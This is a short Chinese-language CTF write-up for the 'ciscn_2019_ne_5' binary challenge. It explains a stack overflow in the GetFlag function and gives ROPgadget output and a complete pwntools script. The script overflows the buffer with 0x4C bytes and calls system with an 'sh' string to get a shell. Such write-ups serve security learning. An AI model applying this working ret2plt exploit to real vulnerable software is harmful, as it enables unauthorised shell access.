ciscn_2019_ne_5
-
32
位ROP
劫持 -
程序逻辑
-
/bin/sh
的替代方案sh
-
栈上覆盖
-
ROPgadgets
查找字符串GetFlag函数
1.
GetFlag
函数中把先前AddLog
中加入的src
变量赋给了dest
,这里存在溢出2.
Print
函数中有system
函数,通过plt_system
利用3.通过
ROPgadgets
得到sh
字符串构造payload
得到shell
bamuwe@qianenzhao:~/done/ciscn_2019_ne_5$ ROPgadget --binary ciscn_2019_ne_5 --string 'sh'
Strings information
============================================================
0x080482ea : sh
administer | ||||
---|---|---|---|---|
1 | ||||
payload1 | padding | 0x4C | dest | |
(padding+leave) | ||||
system_plt_addr | ret | system | ||
0xdeadbeef | ||||
sh | 0x080482ea |
from pwn import *
context.log_level = 'debug'
elf = ELF('./ciscn_2019_ne_5')
io = process('./ciscn_2019_ne_5')
#io = gdb.debug('./ciscn_2019_ne_5','break *080486C7')
io.sendlineafter(b'Please input admin password:',b'administrator')
io.sendlineafter(b':\n',b'1')
payload1 = b'A'*0x4C+p32(elf.sym['system'])+p32(0xdeadbeef)+p32(0x080482ea) #不能用p32(0)替代p32(deadbeef)
io.sendlineafter(b'Please input new log info:',payload1)
io.sendlineafter(b':\n',b'4')
io.interactive()
标签:ciscn,system,ne,sh,2019,io
From: https://www.cnblogs.com/bamuwe/p/17937077